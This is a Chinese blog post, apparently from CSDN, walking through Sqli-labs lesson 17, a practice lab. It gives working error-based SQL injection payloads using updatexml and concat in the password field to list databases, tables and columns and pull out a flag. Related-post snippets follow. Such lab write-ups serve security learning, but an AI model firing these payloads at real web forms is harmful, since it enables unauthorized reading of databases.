Sqli-labs——lesson17报错注入

已于 2022-07-10 10:27:52 修改
阅读量202 收藏
点赞数
分类专栏: Sqli-labs闯关 文章标签: 大数据
于 2022-07-06 14:21:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62281892/article/details/125636173
版权

xpath

我也不知道为啥清楚对username进行了过滤,但是对password没有进行过滤

0x7e是ASCII编码,解码为~,concat是将~和后面连接成字符串,但updatexml()会因为~这个符号不满足xpath语法,所以这个语句不能执行成功,就会报错。

1、查库

uname=admin&passwd=sd' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1)#&Submit=Submit

2、想用group_concat函数来显示所有的库,但是试过以后发现不允许使用group函数

3、查表

uname=admin&passwd=sd' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'  limit 0,1)),1)#&Submit=Submit

 4、查列

uname=admin&passwd=sd' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='01PZEtQN'  limit 0,1)),1)#&Submit=Submit

 5、爆数据

uname=admin&passwd=sd' and updatexml(1,concat(0x7e,(select flag from security.01PZEtQN limit 3,1)),1)#&Submit=Submit  

!!!注意limit m,n 的用法,为从下标为m的开始取n个单位的

 但是flag没有显示完全,要把右边的一起爆出来


uname=admin&passwd=admin' and updatexml(1,concat(0x7e,right((select(group_concat(flag)) from security.thrzKuTU) ,31),0x7e),1) #&submit=Submit

Shock397
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sql注入-sqli-labs第17
weixin_46784800的博客
11-10 1559
sqli-labs第17关 updatexml使用 第17关的关键函数为updatexml函数: UpdateXML(xml_target, xpath_expr, new_xml) 其中,xml_target作用为目标xml,xpath_expr作用为xpath语法,new_xml为要替换掉的xml内容,所以该函数能够用于注入的原因为,当xpath语法不合规时,会报错,实现报错注入。 updatexml(0,concat(0x7e, (select col2 from tableA limit 0,1),
sqli-labs靶场实现(七)【post update语句注入】(less-17、具体步骤+图文详解)
weixin_46709219的博客
12-30 681
一)post update语句注入   1)mysql update介绍   2)过滤内容介绍   3)mysql update注入   4)sqlmap安全措施 —————————————————————————————————————————————————— 一)post update语句注入 1)mysql update介绍 2)过滤内容介绍 3)mysql update注入 4)sqlmap安全措施 ...
sqli-labs-less-17 extractvalue报错注入
yzcn
11-13 276
Less-17 extractvalue报错注入 找寻注入点: 首先用burp suite抓包,得到post信息后,用hackbar进行测试 经过测试发现,无论怎样对uname进行测试,都显示失败,猜测是对uname进行了过滤,我们考虑从password进行注入: 该关卡是对密码进行更改,如果用户名正确,则修改密码为新密码,如果用户名错误,则返回失败, 因此该关卡需先知道一个用户名admin Sql知识: extractvalue(xml_frag,xpath_expr)使用xpath表示法从xml字符串中
sqli-labs第七关sql注入流程
qq_33598708的博客
04-09 3574
正常访问 http://127.0.0.1/sqli-labs-master/Less-7/?id=1 正常访问以后提示Use outfile..... 什么是outfile:参考地址 MySQL中你可以使用SELECT...INTO OUTFILE语句来简单的导出数据到文本文件上。 判断注入类型 http://127.0.0.1/sqli-labs-master/Less-7/?id=1' and '1'='1 通过注入字符没有报错可以判断是字符类型的,这关数据库报错不会提示
SQLi Labs Lesson17
1ame的博客
08-15 1141
Lesson - 17 Update Query - Error Based - String 首先进入欢迎界面: 本页面的作用是重置用户的密码。 本节对注入有过滤。 function check_input($value) { if(!empty($value)) { // truncation (see comments) $value = sub
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
SQLi LABS Less-11 联合注入+报错注入
热门推荐
wangyuxiang946的博客
06-27 1万+
sqli第十一关,sqli-labs less-11,sqlilabs less11
sqli-labs】Less 5——报错注入(updatexml()函数)
用博客做做记录的小白
06-23 1894
sqli-labs靶场第五关less 5,使用报错注入函数updatexml()进行报错注入,注入类型为单引号字符型。
sql注入——报错注入
m0_73756016的博客
10-18 1408
报错注入是什么 什么是报错注入? 这是一种页面响应形式。响应过程如下: 用户在前台页面输入检索内容 后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行。 数据库将执行的结果返回给后台,后台将数据库执行的结果无加区别的显示到前台页面上。 报错注入存在的基础:两个“无加区别”后台对于输入输出的合理性没有做检查 分类 1. 通过floor()报错注入 2.通过extractValue()报错注入 3.通过updateXml()报错注入 4.通过NAME_CONST()
sqli-labs通关全解--关于报错注入--less5-6-3
cyynid的博客
01-10 571
报错注入+less5+less6
利用extractvalue报错注入sqli-labs第五关
m0_64080230的博客
06-21 248
sqli-labs第五关 火狐浏览器 hackbar。
sql_labsql注入所有注入方法详解归纳(union联合注入,post注入,报错注入,head注入,布尔盲注,宽字节注入,堆叠注入,cookie注入,搜索型注入,异或注入)和sql_lab靶场搭
最新发布
qq_59020256的博客
12-27 1324
id=1没有回显id=1 and 1=2 and1=1和and1=2回显效果一致,则判断不是数字型则判断出是字符型注入,且注入是’注入。
sqli-labs-基于报错的注入
zlloveyouforever的博客
04-30 2778
这里使用sqli-labs第六关来学习报错注入,当然第五关也是可以使用的。会简单介绍updatexml(),extractvalue(),floor(),exp(),geometrycollection(),multipoint()六个函数的使用。
sqli-labs】Less 6——报错注入(双引号)
用博客做做记录的小白
07-03 217
sqli-labs第6关less 6,双引号注入型,解题方法为报错注入函数。
sql_labsqli中的报错注入,less13
qq_59020256的博客
12-21 539
或者用1') and extractvalue('1',concat('1',database())) -- s。注意该结果只能显示一行,所以说需要username和password分开查询,否则会出现错误。2.输入用户名和密码123’ 123显示登录错误。1.输入用户名和密码123 123显示登录错误。6.查询username和password。123后面有’)说明是’)注入。5.查询users用户的字段名。报错注入(less-13)Username结果显示。Password结果显示。
sqli-labs注入靶场搭建
09-25
sqli-labs是一个用来学习sql注入的环境。搭建sqli-labs注入靶场可以按照以下步骤进行操作: 1. 准备软件:首先,你需要准备一个支持PHP和MySQL的服务器环境,例如Apache服务器、PHP解释器和MySQL数据库。 2. 下载...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值